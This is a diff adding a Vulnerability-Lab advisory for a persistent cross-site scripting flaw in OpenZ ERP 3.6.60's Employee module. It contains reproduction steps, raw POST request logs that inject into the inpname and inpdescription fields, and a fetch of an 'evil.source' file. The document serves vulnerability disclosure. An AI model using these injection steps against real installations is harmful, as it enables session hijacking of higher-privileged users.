b/exploits/php/webapps/48450.txt new file mode 100644 index 000000000..9f64de59e --- /dev/null +++ b/exploits/php/webapps/48450.txt @@ -0,0 +1,192 @@ +# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting +# Date: 2020-05-11 +# Exploit Author: Vulnerability-Lab +# Vendor: https://www.openz.de/ +# https://www.openz.de/download.html + +Document Title: +=============== +OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2234 + + +Common Vulnerability Scoring System: +==================================== +4.6 + + +Product & Service Introduction: +=============================== +https://www.openz.de/ +https://www.openz.de/download.html + + +Affected Product(s): +==================== +OpenZ +Product: OpenZ v3.6.60 - ERP (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-05-06: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent cross site scripting web vulnerability has been discovered +in the official OpenZ v3.6.60 ERP web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The persistent vulnerability is located in the `inpname` and +`inpdescripción` parameters of the `Employee` add/register/edit +module in the `menu.html` file. Remote attackers with low privileges are +able to inject own malicious persistent script code as +name or description. The injected code can be used to attack the +frontend or backend of the web-application. The request method +to inject is POST and the attack vector is located on the +application-side. The attack can be triggered from low privilege user +accounts against higher privilege user accounts like manager or +administrators to elevate privileges via session hijacking. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external +redirects to malicious source and persistent manipulation of affected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Employee + +Vulnerable Input(s): +[+] Mitarbeiter Name +[+] Beschreibung + +Vulnerable File(s): +[+] Menu.html + +Vulnerable Parameter(s): +[+] inpname +[+] inpdescription + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the openz web-application +2. Register, add or edit via profile settings the inpname & +inpdescription parameter inputs +3. Edit inpname & inpdescription parameter of the profile and save the entry +Note: The execute occurs on preview of the user credentials in the +/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html +4. Successful reproduce of the persistent web vulnerability! + + + +--- POC Session Logs [POST] --- (Inject via Add / Edit) +https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html +Host: localhost:8080 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 1464 +Origin: https://localhost:8080 +Connection: keep-alive +Referer: +https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html +Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; +_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 +Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=& +inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=& +inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=& +inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F& +inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/ +EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B& +inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=& +inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=& +inpvalue=325235&inpname=>">& +inpdescription=>">&inpimageurl=31337& +inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=& +inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=& +inpcity=&inpcreated=26-04-2020 +17:03:35&inpcreatedby=Service&inpupdated=26-04-2020 +17:03:35&inpupdatedby=Service +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.38 (Debian) +Location: +https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- (Execution in Listing) +https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source +Host: myerponline.de +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Connection: keep-alive +Referer: +https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html +Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; +_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Debian) +Content-Type: text/html;charset=utf-8 +Content-Language: en +Content-Length: 1110 +Keep-Alive: timeout=5, max=97 +Connection: Keep-Alive + + +PoC: Vulnerable Source (/security/Menu.html) + + + + +
+ +
+ + + +
325235 - +>">